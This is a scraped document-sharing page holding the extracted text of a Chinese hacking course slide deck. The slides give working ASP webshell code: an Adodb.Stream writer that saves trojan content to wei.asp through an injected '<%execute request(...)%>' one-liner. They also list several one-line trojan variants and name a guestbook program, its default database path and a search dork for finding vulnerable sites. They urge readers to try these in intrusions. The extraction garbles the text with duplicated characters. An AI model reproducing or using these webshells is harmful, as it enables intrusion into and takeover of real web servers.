黑侠脚本课程4PPT文件格式下载.ppt

上传人:b****1 文档编号:14247389 上传时间:2022-10-20 格式:PPT 页数:11 大小:246KB
下载 相关 举报
黑侠脚本课程4PPT文件格式下载.ppt_第1页
第1页 / 共11页
黑侠脚本课程4PPT文件格式下载.ppt_第2页
第2页 / 共11页
黑侠脚本课程4PPT文件格式下载.ppt_第3页
第3页 / 共11页
黑侠脚本课程4PPT文件格式下载.ppt_第4页
第4页 / 共11页
黑侠脚本课程4PPT文件格式下载.ppt_第5页
第5页 / 共11页
点击查看更多>>
下载资源
资源描述

黑侠脚本课程4PPT文件格式下载.ppt

《黑侠脚本课程4PPT文件格式下载.ppt》由会员分享,可在线阅读,更多相关《黑侠脚本课程4PPT文件格式下载.ppt(11页珍藏版)》请在冰豆网上搜索。

黑侠脚本课程4PPT文件格式下载.ppt

/method=post一个提交表单一个提交表单一个提交表单一个提交表单nnnnsetlP=server.CreateObject(Adodb.Stream)setlP=server.CreateObject(Adodb.Stream)nnlP.OpenlP.OpennnlP.Type=2lP.Type=2nnlP.CharSet=gb2312lP.CharSet=gb2312nnlP.writetextrequest(p)lP.writetextrequest(p)nnlP.SaveToFileserver.mappath(conn.asp),2lP.SaveToFileserver.mappath(conn.asp),2nnlP.CloselP.ClosennsetlP=nothingsetlP=nothingnnresponse.redirectconn.aspresponse.redirectconn.aspnnnn这填马的代码这填马的代码nninputtype=submitvalue=nn/nn/程序的主要框架是/取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示/添加木马内容用的nn我们一句一句分析:

我们一句一句分析:

nn/action=后面是需要修改的以asp命名的数据库的提交地址/这个标签的意思是建立一个表单以post方式提交给连接http:

//这里的这里的valuevalue值根据服务端值根据服务端中中valuevalue而设定而设定/可以自行修改成可以自行修改成相应这里的相应这里的valuevalue值也必须改值也必须改为为ppsetlP=server.createObject(Adodb.Stream)/setlP=server.createObject(Adodb.Stream)/建立流对象,有了对象才可以建立流对象,有了对象才可以使用它固有的属性和方法使用它固有的属性和方法lP.Open/lP.Open/打开打开lP.Type=2/lP.Type=2/以文本方式以文本方式lP.CharSet=gb2312/lP.CharSet=gb2312/字体标准字体标准lP.writetextrequest(joeving)/lP.writetextrequest(joeving)/取得木马内容取得木马内容参数参数joevingjoeving可以自己定义可以自己定义但但必须和下面的必须和下面的name=joevingname=joeving相对应相对应lP.SaveToFileserver.mappath(wei.asp),2lP.SaveToFileserver.mappath(wei.asp),2/将木马内容以覆盖文件的方式写入将木马内容以覆盖文件的方式写入wei.aspwei.asp/2/2就是已覆盖的方式,这里的就是已覆盖的方式,这里的wei.aspwei.asp也是可以自己定义的,如定义成也是可以自己定义的,如定义成1.asp1.asp/但和下面的但和下面的response.redirectwei.aspresponse.redirectwei.asp中中wei.aspwei.asp的保持一致的保持一致lP.CloselP.Close/关闭对象关闭对象setlP=nothingsetlP=nothing/释放对象释放对象response.redirectwei.aspresponse.redirectwei.asp/转向生成的转向生成的wei.aspwei.asp和上面的和上面的wei.aspwei.asp相对应,相对应,也就是你熟悉的也就是你熟悉的aspasp木马登木马登陆界面陆界面/这段程序的功能:

利用插入到数据库文件的这段程序的功能:

利用插入到数据库文件的%executerequest(value)%这段代码执行第一个这段代码执行第一个textareatextarea中的内容,并将添加的木马中的内容,并将添加的木马内容写入和指向内容写入和指向wei.aspwei.asp,这样就相当于在服务器上建立了个,这样就相当于在服务器上建立了个aspasp木马文件,木马文件,这样就可以取得这样就可以取得webshellwebshell了了nn添入生成木马的内容/textarea/这段标签是你用来添加木马内容用的返回一句话木马的形式nnnn这句是服务端,配合客户端使用这句是服务端,配合客户端使用nn%executerequest(huan)%nn%nnifrequest(huan)thenexecuteifrequest(huan)thenexecuterequest(huan)request(huan)nn%nn%3C%25execute%20request(%22a%22)%25%3E%3C%25execute%20request(%22a%22)%25%3Enn还有很多我就不一一介绍了还有很多我就不一一介绍了自己在入侵中测试吧自己在入侵中测试吧返回实践漏洞nn为了更容易理解,我找了个简单的留言本,修改出来漏洞,来为大家演示返回课后作业nn测试程序:

音乐听吧测试程序:

音乐听吧nn代码下载:

代码下载:

http:

/n代码缺陷:

默认留言数据库为代码缺陷:

默认留言数据库为aspasp并且没做防下载并且没做防下载处理处理nn默认数据库地址:

默认数据库地址:

/gbook/zpinfo_music_guest.asp/gbook/zpinfo_music_guest.aspnn搜索引擎搜索:

本站所有搜索引擎搜索:

本站所有MP3MP3只链接收集自网上,只链接收集自网上,其版权属歌手本人或其所属唱片公司所有,用户其版权属歌手本人或其所属唱片公司所有,用户请在下载后的请在下载后的2323小时内删除小时内删除MP3MP3歌曲,请购买正歌曲,请购买正版版CDCD以支持你们的偶像!

谢谢合作!

以支持你们的偶像!

返回

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 教学研究 > 教学案例设计

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1